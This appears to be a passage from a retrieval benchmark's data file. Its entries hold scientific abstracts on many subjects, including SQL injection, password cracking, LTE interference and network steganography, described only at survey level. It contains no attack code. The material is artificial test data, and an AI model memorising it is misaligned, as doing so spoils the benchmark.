"text": "The aim of this study was to investigate the consequences of friend networking sites (e.g., Friendster, MySpace) for adolescents' self-esteem and well-being. We conducted a survey among 881 adolescents (10-19-year-olds) who had an online profile on a Dutch friend networking site. Using structural equation modeling, we found that the frequency with which adolescents used the site had an indirect effect on their social self-esteem and well-being. The use of the friend networking site stimulated the number of relationships formed on the site, the frequency with which adolescents received feedback on their profiles, and the tone (i.e., positive vs. negative) of this feedback. Positive feedback on the profiles enhanced adolescents' social self-esteem and well-being, whereas negative feedback decreased their self-esteem and well-being.",
"title": ""
},
{
"docid": "8e2e941c568328743c3fc56fda06b000",
"text": "Neuroscientific research has consistently found that the perception of an affective state in another activates the observer's own neural substrates for the corresponding state, which is likely the neural mechanism for \"true empathy.\" However, to date there has not been a brain-imaging investigation of so-called \"cognitive empathy\", whereby one \"actively projects oneself into the shoes of another person,\" imagining someone's personal, emotional experience as if it were one's own. In order to investigate this process, we conducted a combined psychophysiology and PET and study in which participants imagined: (1) a personal experience of fear or anger from their own past; (2) an equivalent experience from another person as if it were happening to them; and (3) a nonemotional experience from their own past. When participants could relate to the scenario of the other, they produced patterns of psychophysiological and neuroimaging activation equivalent to those of personal emotional imagery, but when they could not relate to the other's story, differences emerged on all measures, e.g., decreased psychophysiological responses and recruitment of a region between the inferior temporal and fusiform gyri. The substrates of cognitive empathy overlap with those of personal feeling states to the extent that one can relate to the state and situation of the other.",
"title": ""
},
{
"docid": "2e6f7dbf2e8c22e10e210bb7d7dff503",
"text": "In this paper, we present a detailed review on various types of SQL injection attacks, vulnerabilities, and prevention techniques. Alongside presenting our findings from the survey, we also note down future expectations and possible development of countermeasures against SQL injection attacks.",
"title": ""
},
{
"docid": "23ee528e0efe7c4fec7f8cda7e49a8dd",
"text": "The development of reliability-based design criteria for surface ship structures needs to consider the following three components: (1) loads, (2) structural strength, and (3) methods of reliability analysis. A methodology for reliability-based design of ship structures is provided in this document. The methodology consists of the following two approaches: (1) direct reliabilitybased design, and (2) load and resistance factor design (LRFD) rules. According to this methodology, loads can be linearly or nonlinearly treated. Also in assessing structural strength, linear or nonlinear analysis can be used. The reliability assessment and reliability-based design can be performed at several levels of a structural system, such as at the hull-girder, grillage, panel, plate and detail levels. A rational treatment of uncertainty is suggested by considering all its types. Also, failure definitions can have significant effects on the assessed reliability, or resulting reliability-based designs. A method for defining and classifying failures at the system level is provided. The method considers the continuous nature of redundancy in ship structures. A bibliography is provided at the end of this document to facilitate future implementation of the methodology.",
"title": ""
},
{
"docid": "12fe1e2edd640b55a769e5c881822aa6",
"text": "In this paper we introduce a runtime system to allow unmodified multi-threaded applications to use multiple machines. The system allows threads to migrate freely between machines depending on the workload. Our prototype, COMET (Code Offload by Migrating Execution Transparently), is a realization of this design built on top of the Dalvik Virtual Machine. COMET leverages the underlying memory model of our runtime to implement distributed shared memory (DSM) with as few interactions between machines as possible. Making use of a new VM-synchronization primitive, COMET imposes little restriction on when migration can occur. Additionally, enough information is maintained so one machine may resume computation after a network failure. We target our efforts towards augmenting smartphones or tablets with machines available in the network. We demonstrate the effectiveness of COMET on several real applications available on Google Play. These applications include image editors, turn-based games, a trip planner, and math tools. Utilizing a server-class machine, COMET can offer significant speed-ups on these real applications when run on a modern smartphone. With WiFi and 3G networks, we observe geometric mean speed-ups of 2.88X and 1.27X relative to the Dalvik interpreter across the set of applications with speed-ups as high as 15X on some applications.",
"title": ""
},
{
"docid": "a8ab6e98631639c0779271d5b57aae87",
"text": "Neonates are at high risk of meningitis and of resulting neurologic complications. Early recognition of neonates at risk of poor prognosis would be helpful in providing timely management. From January 2008 to June 2014, we enrolled 232 term neonates with bacterial meningitis admitted to 3 neonatology departments in Shanghai, China. The clinical status on the day of discharge from these hospitals or at a postnatal age of 2.5 to 3 months was evaluated using the Glasgow Outcome Scale (GOS). Patients were classified into two outcome groups: good (167 cases, 72.0%, GOS = 5) or poor (65 cases, 28.0%, GOS = 1-4). Neonates with good outcome had less frequent apnea, drowsiness, poor feeding, bulging fontanelle, irritability and more severe jaundice compared to neonates with poor outcome. The good outcome group also had less pneumonia than the poor outcome group. Besides, there were statistically significant differences in hemoglobin, mean platelet volume, platelet distribution width, C-reaction protein, procalcitonin, cerebrospinal fluid (CSF) glucose and CSF protein. Multivariate logistic regression analyses suggested that poor feeding, pneumonia and CSF protein were the predictors of poor outcome. CSF protein content was significantly higher in patients with poor outcome. The best cut-offs for predicting poor outcome were 1,880 mg/L in CSF protein concentration (sensitivity 70.8%, specificity 86.2%). After 2 weeks of treatment, CSF protein remained higher in the poor outcome group. High CSF protein concentration may prognosticate poor outcome in neonates with bacterial meningitis.",
"title": ""
},
{
"docid": "8bf5f5e332159674389d2026514fbc15",
"text": "This project examines the nature of password cracking and modern applications. Several applications for different platforms are studied. Different methods of cracking are explained, including dictionary attack, brute force, and rainbow tables. Password cracking across different mediums is examined. Hashing and how it affects password cracking is discussed. An implementation of two hash-based password cracking algorithms is developed, along with experimental results of their efficiency.",
"title": ""
},
{
"docid": "61575f2a6f02a652aa050ed4b8a72385",
"text": "To determine the accuracy of a pregnancy-associated glycoprotein (PAG) ELISA in identifying pregnancy status 27 d after timed artificial insemination (TAI), blood samples were collected from lactating Holstein cows (n = 1,079) 27 d after their first, second, and third postpartum TAI services. Pregnancy diagnosis by transrectal ultrasonography (TU) was performed immediately after blood sample collection, and pregnancy outcomes by TU served as a standard to test the accuracy of the PAG ELISA. Pregnancy outcomes based on the PAG ELISA and TU that agreed were considered correct, whereas the pregnancy status of cows in which pregnancy outcomes between PAG and TU disagreed were reassessed by TU 5 d later. The accuracy of pregnancy diagnosis was less than expected when using TU 27 d after TAI (93.7 to 97.8%), especially when pregnancy outcomes were based on visualization of chorioallantoic fluid and a corpus luteum but when an embryo was not visualized. The accuracy of PAG ELISA outcomes 27 d after TAI was 93.7, 95.4, and 96.2% for first, second, and third postpartum TAI services, respectively. Statistical agreement (kappa) between TU and the PAG ELISA 27 d after TAI was 0.87 to 0.90. Pregnancy outcomes based on the PAG ELISA had a high negative predictive value, indicating that the probability of incorrectly administering PGF(2alpha) to pregnant cows would be low if this test were implemented on a commercial dairy.",
"title": ""
},
{
"docid": "52f95d1c0e198c64455269fd09108703",
"text": "Dynamic control theory has long been used in solving optimal asset allocation problems, and a number of trading decision systems based on reinforcement learning methods have been applied in asset allocation and portfolio rebalancing. In this paper, we extend the existing work in recurrent reinforcement learning (RRL) and build an optimal variable weight portfolio allocation under a coherent downside risk measure, the expected maximum drawdown, E(MDD). In particular, we propose a recurrent reinforcement learning method, with a coherent risk adjusted performance objective function, the Calmar ratio, to obtain both buy and sell signals and asset allocation weights. Using a portfolio consisting of the most frequently traded exchange-traded funds, we show that the expected maximum drawdown risk based objective function yields superior return performance compared to previously proposed RRL objective functions (i.e. the Sharpe ratio and the Sterling ratio), and that variable weight RRL long/short portfolios outperform equal weight RRL long/short portfolios under different transaction cost scenarios. We further propose an adaptive E(MDD) risk based RRL portfolio rebalancing decision system with a transaction cost and market condition stop-loss retraining mechanism, and we show that the ∗Corresponding author: Steve Y. Yang, Postal address: School of Business, Stevens Institute of Technology, 1 Castle Point on Hudson, Hoboken, NJ 07030 USA. Tel.: +1 201 216 3394 Fax: +1 201 216 5385 Email addresses: salmahdi@stevens.edu (Saud Almahdi), steve.yang@stevens.edu (Steve Y. Yang) Preprint submitted to Expert Systems with Applications June 15, 2017",
"title": ""
},
{
"docid": "049a7164a973fb515ed033ba216ec344",
"text": "Modern vehicle fleets, e.g., for ridesharing platforms and taxi companies, can reduce passengers' waiting times by proactively dispatching vehicles to locations where pickup requests are anticipated in the future. Yet it is unclear how to best do this: optimal dispatching requires optimizing over several sources of uncertainty, including vehicles' travel times to their dispatched locations, as well as coordinating between vehicles so that they do not attempt to pick up the same passenger. While prior works have developed models for this uncertainty and used them to optimize dispatch policies, in this work we introduce a model-free approach. Specifically, we propose MOVI, a Deep Q-network (DQN)-based framework that directly learns the optimal vehicle dispatch policy. Since DQNs scale poorly with a large number of possible dispatches, we streamline our DQN training and suppose that each individual vehicle independently learns its own optimal policy, ensuring scalability at the cost of less coordination between vehicles. We then formulate a centralized receding-horizon control (RHC) policy to compare with our DQN policies. To compare these policies, we design and build MOVI as a large-scale realistic simulator based on 15 million taxi trip records that simulates policy-agnostic responses to dispatch decisions. We show that the DQN dispatch policy reduces the number of unserviced requests by 76% compared to without dispatch and 20% compared to the RHC approach, emphasizing the benefits of a model-free approach and suggesting that there is limited value to coordinating vehicle actions. This finding may help to explain the success of ridesharing platforms, for which drivers make individual decisions.",
"title": ""
},
{
"docid": "9c510d7ddeb964c5d762d63d9e284f44",
"text": "This paper explains the rationale for the development of reconfigurable manufacturing systems, which possess the advantages both of dedicated lines and of flexible systems. The paper defines the core characteristics and design principles of reconfigurable manufacturing systems (RMS) and describes the structure recommended for practical RMS with RMS core characteristics. After that, a rigorous mathematical method is introduced for designing RMS with this recommended structure. An example is provided to demonstrate how this RMS design method is used. The paper concludes with a discussion of reconfigurable assembly systems. © 2011 The Society of Manufacturing Engineers. Published by Elsevier Ltd. All rights reserved.",
"title": ""
},
{
"docid": "c25a03119f18655aae434424d99fe986",
"text": "In this paper we introduce, analyze and quantitatively compare a number of surface simplification methods for point-sampled geometry. We have implemented incremental and hierarchical clustering, iterative simplification, and particle simulation algorithms to create approximations of point-based models with lower sampling density. All these methods work directly on the point cloud, requiring no intermediate tesselation. We show how local variation estimation and quadric error metrics can be employed to diminish the approximation error and concentrate more samples in regions of high curvature. To compare the quality of the simplified surfaces, we have designed a new method for computing numerical and visual error estimates for point-sampled surfaces. Our algorithms are fast, easy to implement, and create high-quality surface approximations, clearly demonstrating the effectiveness of point-based surface simplification.",
"title": ""
},
{
"docid": "49cab61f0bb863e759585da23c9bb96c",
"text": "An UHD AMOLED display driver IC, enabling real-time TFT non-uniformity compensation, is presented with a hybrid driving scheme. The proposed hybrid driving scheme drives a mobile UHD (3840×1920) AMOLED panel, whose scan time is 7.7μs at a scan frequency of 60Hz, through the load of 30kohm resistance and 30pF capacitance. A proposed accurate current sensor embedded in the column driver and a back-end compensation scheme reduce maximum current error between emulated TFTs within 0.94 LSB (37nA) of 8-bit gray scales. Since the TFT variation is externally compensated, a simple 3T1C pixel circuit is employed in each pixel.",
"title": ""
},
{
"docid": "fe2870a3f36b9a042ec9cece5a64dafd",
"text": "This paper provides a methodology to study the PHY layer vulnerability of wireless protocols in hostile radio environments. Our approach is based on testing the vulnerabilities of a system by analyzing the individual subsystems. By targeting an individual subsystem or a combination of subsystems at a time, we can infer the weakest part and revise it to improve the overall system performance. We apply our methodology to 4G LTE downlink by considering each control channel as a subsystem. We also develop open-source software enabling research and education using software-defined radios. We present experimental results with open-source LTE systems and shows how the different subsystems behave under targeted interference. The analysis for the LTE downlink shows that the synchronization signals (PSS/SSS) are very resilient to interference, whereas the downlink pilots or Cell-Specific Reference signals (CRS) are the most susceptible to a synchronized protocol-aware interferer. We also analyze the severity of control channel attacks for different LTE configurations. Our methodology and tools allow rapid evaluation of the PHY layer reliability in harsh signaling environments, which is an asset to improve current standards and develop new and robust wireless protocols.",
"title": ""
},
{
"docid": "48b1fdb9343aee6582f11013d63667de",
"text": "Most of the state of the art works and researches on the automatic sentiment analysis and opinion mining of texts collected from social networks and microblogging websites are oriented towards the classification of texts into positive and negative. In this paper, we propose a pattern-based approach that goes deeper in the classification of texts collected from Twitter (i.e., tweets). We classify the tweets into 7 different classes; however the approach can be run to classify into more classes. Experiments show that our approach reaches an accuracy of classification equal to 56.9% and a precision level of sentimental tweets (other than neutral and sarcastic) equal to 72.58%. Nevertheless, the approach proves to be very accurate in binary classification (i.e., classification into “positive” and “negative”) and ternary classification (i.e., classification into “positive”, “negative” and “neutral”): in the former case, we reach an accuracy of 87.5% for the same dataset used after removing neutral tweets, and in the latter case, we reached an accuracy of classification of 83.0%.",
"title": ""
},
{
"docid": "b44de9b14b6084a88139a3bbf52f337b",
"text": "Standard user applications provide a range of cross-cutting interaction techniques that are common to virtually all such tools: selection, filtering, navigation, layer management, and cut-and-paste. We present VisDock, a JavaScript mixin library that provides a core set of these cross-cutting interaction techniques for visualization, including selection (lasso, paths, shape selection, etc), layer management (visibility, transparency, set operations, etc), navigation (pan, zoom, overview, magnifying lenses, etc), and annotation (point-based, region-based, data-space based, etc). To showcase the utility of the library, we have released it as Open Source and integrated it with a large number of existing web-based visualizations. Furthermore, we have evaluated VisDock using qualitative studies with both developers utilizing the toolkit to build new web-based visualizations, as well as with end-users utilizing it to explore movie ratings data. Results from these studies highlight the usability and effectiveness of the toolkit from both developer and end-user perspectives.",
"title": ""
},
{
"docid": "5ea65120d42f75d594d73e92cc82dc48",
"text": "There is a new generation of emoticons, called emojis, that is increasingly being used in mobile communications and social media. In the past two years, over ten billion emojis were used on Twitter. Emojis are Unicode graphic symbols, used as a shorthand to express concepts and ideas. In contrast to the small number of well-known emoticons that carry clear emotional contents, there are hundreds of emojis. But what are their emotional contents? We provide the first emoji sentiment lexicon, called the Emoji Sentiment Ranking, and draw a sentiment map of the 751 most frequently used emojis. The sentiment of the emojis is computed from the sentiment of the tweets in which they occur. We engaged 83 human annotators to label over 1.6 million tweets in 13 European languages by the sentiment polarity (negative, neutral, or positive). About 4% of the annotated tweets contain emojis. The sentiment analysis of the emojis allows us to draw several interesting conclusions. It turns out that most of the emojis are positive, especially the most popular ones. The sentiment distribution of the tweets with and without emojis is significantly different. The inter-annotator agreement on the tweets with emojis is higher. Emojis tend to occur at the end of the tweets, and their sentiment polarity increases with the distance. We observe no significant differences in the emoji rankings between the 13 languages and the Emoji Sentiment Ranking. Consequently, we propose our Emoji Sentiment Ranking as a European language-independent resource for automated sentiment analysis. Finally, the paper provides a formalization of sentiment and a novel visualization in the form of a sentiment bar.",
"title": ""
}
] | scidocsrr |
17ba8244a5585c6df1cd6687f4abbf40 | Embedding Covert Channels into TCP/IP | [
{
"docid": "7034be316fcc2862d896b51662939c40",
"text": "This article presents HICCUPS (HIdden Communication system for CorrUPted networkS), a steganographic system dedicated to shared medium networks including wireless local area networks. The novelty of HICCUPS is: usage of secure telecommunications network armed with cryptographic mechanisms to provide steganographic system and proposal of new protocol with bandwidth allocation based on corrupted frames. All functional parts of the system and possibility of its implementation in existing public networks are discussed. An example of implementation framework for wireless local area networks IEEE 802.11 is also presented.",
"title": ""
}
] | [
{
"docid": "236dcb6dd7e04c0600c2f0b90f94c5dd",
"text": "Main call for Cloud computing is that users only utilize what they required and only pay for what they really use. Mobile Cloud Computing refers to an infrastructure where data processing and storage can happen away from mobile device. Portio research estimates that mobile subscribers worldwide will reach 6.9 billion by the end of 2013 and 8 billion by the end of 2016. Ericsson also forecasts that mobile subscriptions will reach 9 billion by 2017. Due to increasing use of mobile devices the requirement of cloud computing in mobile devices arise, which gave birth to Mobile Cloud Computing. Mobile devices do not need to have large storage capacity and powerful CPU speed. Due to storing data on cloud there is an issue of data security. Because of the risk associated with data storage many IT professionals are not showing their interest towards Mobile Cloud Computing. To ensure the correctness of users' data in the cloud, we propose an effective mechanism with salient feature of data integrity and confidentiality. This paper proposed a mechanism which uses the concept of RSA algorithm, Hash function along with several cryptography tools to provide better security to the data stored on the mobile cloud.",
"title": ""
},
{
"docid": "dcf8fc03b228c9d7f715605f06d55ed7",
"text": "This paper presents an exploratory study in which a humanoid robot (MecWilly) acted as a partner to preschool children, helping them to learn English words. In order to use the Socio-Cognitive Conflict paradigm to induce the knowledge acquisition process, we designed a playful activity in which children worked in pairs with another child or with the humanoid robot on a word-picture association task involving fruit and vegetables. The analysis of the two experimental conditions (child-child and child-robot) demonstrates the effectiveness of Socio-Cognitive Conflict in improving the children’s learning of English. Furthermore, the analysis of children's performances as reported in this study appears to highlight the potential use of humanoid robots in the acquisition of English by young children.",
"title": ""
},
{
"docid": "3c38b800109f75a352d16da2ee35b8bb",
"text": "Recurrent neural networks (RNNs) have been widely used for processing sequential data. However, RNNs are commonly difficult to train due to the well-known gradient vanishing and exploding problems and hard to learn long-term patterns. Long short-term memory (LSTM) and gated recurrent unit (GRU) were developed to address these problems, but the use of hyperbolic tangent and the sigmoid action functions results in gradient decay over layers. Consequently, construction of an efficiently trainable deep network is challenging. In addition, all the neurons in an RNN layer are entangled together and their behaviour is hard to interpret. To address these problems, a new type of RNN, referred to as independently recurrent neural network (IndRNN), is proposed in this paper, where neurons in the same layer are independent of each other and they are connected across layers. We have shown that an IndRNN can be easily regulated to prevent the gradient exploding and vanishing problems while allowing the network to learn long-term dependencies. Moreover, an IndRNN can work with non-saturated activation functions such as relu (rectified linear unit) and be still trained robustly. Multiple IndRNNs can be stacked to construct a network that is deeper than the existing RNNs. Experimental results have shown that the proposed IndRNN is able to process very long sequences (over 5000 time steps), can be used to construct very deep networks (21 layers used in the experiment) and still be trained robustly. Better performances have been achieved on various tasks by using IndRNNs compared with the traditional RNN and LSTM.",
"title": ""
},
{
"docid": "7fefe01183ad6c9c897b83f9b9bbe5be",
"text": "The Pap smear test is a manual screening procedure that is used to detect precancerous changes in cervical cells based on color and shape properties of their nuclei and cytoplasms. Automating this procedure is still an open problem due to the complexities of cell structures. In this paper, we propose an unsupervised approach for the segmentation and classification of cervical cells. The segmentation process involves automatic thresholding to separate the cell regions from the background, a multi-scale hierarchical segmentation algorithm to partition these regions based on homogeneity and circularity, and a binary classifier to finalize the separation of nuclei from cytoplasm within the cell regions. Classification is posed as a grouping problem by ranking the cells based on their feature characteristics modeling abnormality degrees. The proposed procedure constructs a tree using hierarchical clustering, and then arranges the cells in a linear order by using an optimal leaf ordering algorithm that maximizes the similarity of adjacent leaves without any requirement for training examples or parameter adjustment. Performance evaluation using two data sets show the effectiveness of the proposed approach in images having inconsistent staining, poor contrast, and overlapping cells.",
"title": ""
},
{
"docid": "c8e34c208f11c367e1f131edaa549c20",
"text": "Recently one dimensional (1-D) nanostructured metal-oxides have attracted much attention because of their potential applications in gas sensors. 1-D nanostructured metal-oxides provide high surface to volume ratio, while maintaining good chemical and thermal stabilities with minimal power consumption and low weight. In recent years, various processing routes have been developed for the synthesis of 1-D nanostructured metal-oxides such as hydrothermal, ultrasonic irradiation, electrospinning, anodization, sol-gel, molten-salt, carbothermal reduction, solid-state chemical reaction, thermal evaporation, vapor-phase transport, aerosol, RF sputtering, molecular beam epitaxy, chemical vapor deposition, gas-phase assisted nanocarving, UV lithography and dry plasma etching. A variety of sensor fabrication processing routes have also been developed. Depending on the materials, morphology and fabrication process the performance of the sensor towards a specific gas shows a varying degree of success. This article reviews and evaluates the performance of 1-D nanostructured metal-oxide gas sensors based on ZnO, SnO(2), TiO(2), In(2)O(3), WO(x), AgVO(3), CdO, MoO(3), CuO, TeO(2) and Fe(2)O(3). Advantages and disadvantages of each sensor are summarized, along with the associated sensing mechanism. Finally, the article concludes with some future directions of research.",
"title": ""
},
{
"docid": "27dff3b0339eacbdc3ab3ad8d16598ca",
"text": "In this paper we show a low cost and environmentally friendly fabrication for an agricultural sensing application. An antenna, a soil moisture sensor, and a leaf wetness sensor are inkjet-printed on paper substrate. A microprocessor attached to the paper substrate is capable of detecting the capacitance change on the surface of the sensor, and report the data over the wireless communication interface. This sensing system is useful to optimize irrigation systems.",
"title": ""
},
{
"docid": "e3b707ad340b190393d3384a1a364e63",
"text": "ed Log Lines Categorize Bins Figure 3. High-level overview of our approach for abstracting execution logs to execution events. Table III. Log lines used as a running example to explain our approach. 1. Start check out 2. Paid for, item=bag, quality=1, amount=100 3. Paid for, item=book, quality=3, amount=150 4. Check out, total amount is 250 5. Check out done Copyright q 2008 John Wiley & Sons, Ltd. J. Softw. Maint. Evol.: Res. Pract. 2008; 20:249–267 DOI: 10.1002/smr AN AUTOMATED APPROACH FOR ABSTRACTING EXECUTION LOGS 257 Table IV. Running example logs after the anonymize step. 1. Start check out 2. Paid for, item=$v, quality=$v, amount=$v 3. Paid for, item=$v, quality=$v, amount=$v 4. Check out, total amount=$v 5. Check out done Table V. Running example logs after the tokenize step. Bin names (no. of words, no. of parameters) Log lines (3,0) 1. Start check out 5. Check out done (5,1) 4. Check out, total amount=$v (8,3) 2. Paid for, item=$v, quality=$v, amount=$v 3. Paid for, item=$v, quality=$v, amount=$v 4.2.2. The tokenize step The tokenize step separates the anonymized log lines into different groups (i.e., bins) according to the number of words and estimated parameters in each log line. The use of multiple bins limits the search space of the following step (i.e., the categorize step). The use of bins permits us to process large log files in a timely fashion using a limited memory footprint since the analysis is done per bin instead of having to load up all the lines in the log file. We estimate the number of parameters in a log line by counting the number of generic terms (i.e., $v). Log lines with the same number of tokens and parameters are placed in the same bin. Table V shows the sample log lines after the anonymize and tokenize steps. The left column indicates the name of a bin. Each bin is named with a tuple: number of words and number of parameters that are contained in the log line associated with that bin. The right column in Table VI shows the log lines. Each row shows the bin and its corresponding log lines. The second and the third log lines contain 8 words and are likely to contain 3 parameters. Thus, the second and third log lines are grouped together in the (8,3) bin. Similarly, the first and last log lines are grouped together in the (3,0) bin since they both contain 3 words and are likely to contain no parameters. 4.2.3. The categorize step The categorize step compares log lines in each bin and abstracts them to the corresponding execution events. The inferred execution events are stored in an execution events database for future references. The algorithm used in the categorize step is shown below. Our algorithm goes through the log lines Copyright q 2008 John Wiley & Sons, Ltd. J. Softw. Maint. Evol.: Res. Pract. 2008; 20:249–267 DOI: 10.1002/smr 258 Z. M. JIANG ET AL. Table VI. Running example logs after the categorize step. Execution events (word parameter id) Log lines 3 0 1 1. Start check out 3 0 2 5. Check out done 5 1 1 4. Check out, total amount=$v 8 3 1 2. Paid for, item=$v, quality=$v, amount=$v 8 3 1 3. Paid for, item=$v, quality=$v, amount=$v bin by bin. After this step, each log line should be abstracted to an execution event. Table VI shows the results of our working example after the categorize step. for each bin bi for each log line lk in bin bi for each execution event e(bi , j) corresponding to bi in the events DB perform word by word comparison between e(bi , j) and lk if (there is no difference) then lk is of type e(bi , j) break end if end for // advance to next e(bi , j) if ( lk does not have a matching execution event) then lk is a new execution event store an abstracted lk into the execution events DB end if end for // advance to the next log line end for // advance to the next bin We now explain our algorithm using the running example. Our algorithm starts with the (3,0) bin. Initially, there are no execution events that correspond to this bin yet. Therefore, the execution event corresponding to the first log line becomes the first execution event namely 3 0 1. The 1 at the end of 3 0 1 indicates that this is the first execution event to correspond to the bin, which has 3 words and no parameters (i.e., bin 3 0). Then the algorithm moves to the next log line in the (3,0) bin, which contains the fifth log line. The algorithm compares the fifth log line with all the existing execution events in the (3,0) bin. Currently, there is only one execution event: 3 0 1. As the fifth log line is not similar to the 3 0 1 execution event, we create a new execution event 3 0 2 for the fifth log line. With all the log lines in the (3,0) bin processed, we can move on to the (5,1) bin. As there are no execution events that correspond to the (5,1) bin initially, the fourth log line gets assigned to a new execution event 5 1 1. Finally, we move on to the (8,3) bin. First, the second log line gets assigned with a new execution event 8 3 1 since there are no execution events corresponding to this bin yet. As the third log line is the same as the second log line (after the anonymize step), the third log line is categorized as the same execution event as the second log Copyright q 2008 John Wiley & Sons, Ltd. J. Softw. Maint. Evol.: Res. Pract. 2008; 20:249–267 DOI: 10.1002/smr AN AUTOMATED APPROACH FOR ABSTRACTING EXECUTION LOGS 259 line. Table VI shows the sample log lines after the categorize step. The left column is the abstracted execution event. The right column shows the line number together with the corresponding log lines. 4.2.4. The reconcile step Since the anonymize step uses heuristics to identify dynamic information in a log line, there is a chance that we might miss to anonymize some dynamic information. The missed dynamic information will result in the abstraction of several log lines to several execution events that are very similar. Table VII shows an example of dynamic information that was missed by the anonymize step. The table shows five different execution events. However, the user names after ‘for user’ are dynamic information and should have been replaced by the generic token ‘$v’. All the log lines shown in Table VII should have been abstracted to the same execution event after the categorize step. The reconcile step addresses this situation. All execution events are re-examined to identify which ones are to be merged. Execution events are merged if: 1. They belong to the same bin. 2. They differ from each other by one token at the same positions. 3. There exists a few of such execution events. We used a threshold of five events in our case studies. Other values are possibly based on the content of the analyzed log files. The threshold prevents the merging of similar yet different execution events, such as ‘Start processing’ and ‘Stop processing’, which should not be merged. Looking at the execution events in Table VII, we note that they all belong to the ‘5 0’ bin and differ from each other only in the last token. Since there are five of such events, we merged them into one event. Table VIII shows the execution events from Table VII after the reconcile step. Note that if the ‘5 0’ bin contains another execution event: ‘Stop processing for user John’; it will not be merged with the above execution events since it differs by two tokens instead of only the last token. Table VII. Sample logs that the categorize step would fail to abstract. Event IDs Execution events 5 0 1 Start processing for user Jen 5 0 2 Start processing for user Tom 5 0 3 Start processing for user Henry 5 0 4 Start processing for user Jack 5 0 5 Start processing for user Peter Table VIII. Sample logs after the reconcile step. Event IDs Execution events 5 0 1 Start processing for user $v Copyright q 2008 John Wiley & Sons, Ltd. J. Softw. Maint. Evol.: Res. Pract. 2008; 20:249–267 DOI: 10.1002/smr 260 Z. M. JIANG ET AL.",
"title": ""
},
{
"docid": "829064562b2070d532b3bf108adb0ea2",
"text": "The design of power semiconductor chips has always involved a trade-off between switching speed, static losses, safe operating area and short-circuit withstanding capability. This paper presents an optimized structure for 1200 V IGBTs from the viewpoint of all-round performance. The new device is based on a novel wide cell pitch carrier stored trench bipolar transistor (CSTBT). Unlike conventional trench gate IGBTs, this structure simultaneously achieves both low on-state voltage and the rugged short-circuit capability desired for industrial applications.",
"title": ""
},
{
"docid": "090f7194e7d1ae2bb28a472634ae4733",
"text": "Large-scale surveys of single-cell gene expression have the potential to reveal rare cell populations and lineage relationships but require efficient methods for cell capture and mRNA sequencing. Although cellular barcoding strategies allow parallel sequencing of single cells at ultra-low depths, the limitations of shallow sequencing have not been investigated directly. By capturing 301 single cells from 11 populations using microfluidics and analyzing single-cell transcriptomes across downsampled sequencing depths, we demonstrate that shallow single-cell mRNA sequencing (∼50,000 reads per cell) is sufficient for unbiased cell-type classification and biomarker identification. In the developing cortex, we identify diverse cell types, including multiple progenitor and neuronal subtypes, and we identify EGR1 and FOS as previously unreported candidate targets of Notch signaling in human but not mouse radial glia. Our strategy establishes an efficient method for unbiased analysis and comparison of cell populations from heterogeneous tissue by microfluidic single-cell capture and low-coverage sequencing of many cells.",
"title": ""
},
{
"docid": "610fc1b5ddfe81b338ee322e95e32f72",
"text": "The automated building detection in aerial images is a fundamental problem encountered in aerial and satellite images analysis. Recently, thanks to the advances in feature descriptions, Region-based CNN model (R-CNN) for object detection is receiving an increasing attention. Despite the excellent performance in object detection, it is problematic to directly leverage the features of R-CNN model for building detection in single aerial image. As we know, the single aerial image is in vertical view and the buildings possess significant directional feature. However, in R-CNN model, direction of the building is ignored and the detection results are represented by horizontal rectangles. For this reason, the detection results with horizontal rectangle cannot describe the building precisely. To address this problem, in this paper, we proposed a novel model with a key feature related to orientation, namely, Oriented R-CNN (OR-CNN). Our contributions are mainly in the following two aspects: 1) Introducing a new oriented layer network for detecting the rotation angle of building on the basis of the successful VGG-net R-CNN model; 2) the oriented rectangle is proposed to leverage the powerful R-CNN for remote-sensing building detection. In experiments, we establish a complete and bran-new data set for training our oriented R-CNN model and comprehensively evaluate the proposed method on a publicly available building detection data set. We demonstrate State-of-the-art results compared with the previous baseline methods.",
"title": ""
},
{
"docid": "733ddc5a642327364c2bccb6b1258fac",
"text": "Human memory is unquestionably a vital cognitive ability but one that can often be unreliable. External memory aids such as diaries, photos, alarms and calendars are often employed to assist in remembering important events in our past and future. The recent trend for lifelogging, continuously documenting ones life through wearable sensors and cameras, presents a clear opportunity to augment human memory beyond simple reminders and actually improve its capacity to remember. This article surveys work from the fields of computer science and psychology to understand the potential for such augmentation, the technologies necessary for realising this opportunity and to investigate what the possible benefits and ethical pitfalls of using such technology might be.",
"title": ""
},
{
"docid": "8ec018e0fc4ca7220387854bdd034a58",
"text": "Despite the overwhelming success of deep learning in various speech processing tasks, the problem of separating simultaneous speakers in a mixture remains challenging. Two major difficulties in such systems are the arbitrary source permutation and unknown number of sources in the mixture. We propose a novel deep learning framework for single channel speech separation by creating attractor points in high dimensional embedding space of the acoustic signals which pull together the time-frequency bins corresponding to each source. Attractor points in this study are created by finding the centroids of the sources in the embedding space, which are subsequently used to determine the similarity of each bin in the mixture to each source. The network is then trained to minimize the reconstruction error of each source by optimizing the embeddings. The proposed model is different from prior works in that it implements an end-to-end training, and it does not depend on the number of sources in the mixture. Two strategies are explored in the test time, K-means and fixed attractor points, where the latter requires no post-processing and can be implemented in real-time. We evaluated our system on Wall Street Journal dataset and show 5.49% improvement over the previous state-of-the-art methods.",
"title": ""
},
{
"docid": "6dfa3f106d58a7cb1ee136685e3ccc39",
"text": "BACKGROUND\nA short battery of physical performance tests was used to assess lower extremity function in more than 5,000 persons age 71 years and older in three communities.\n\n\nMETHODS\nBalance, gait, strength, and endurance were evaluated by examining ability to stand with the feet together in the side-by-side, semi-tandem, and tandem positions, time to walk 8 feet, and time to rise from a chair and return to the seated position 5 times.\n\n\nRESULTS\nA wide distribution of performance was observed for each test. Each test and a summary performance scale, created by summing categorical rankings of performance on each test, were strongly associated with self-report of disability. Both self-report items and performance tests were independent predictors of short-term mortality and nursing home admission in multivariate analyses. However, evidence is presented that the performance tests provide information not available from self-report items. Of particular importance is the finding that in those at the high end of the functional spectrum, who reported almost no disability, the performance test scores distinguished a gradient of risk for mortality and nursing home admission. Additionally, within subgroups with identical self-report profiles, there were systematic differences in physical performance related to age and sex.\n\n\nCONCLUSION\nThis study provides evidence that performance measures can validly characterize older persons across a broad spectrum of lower extremity function. Performance and self-report measures may complement each other in providing useful information about functional status.",
"title": ""
},
{
"docid": "df83f2aa0347bfb3131e8c53b805084b",
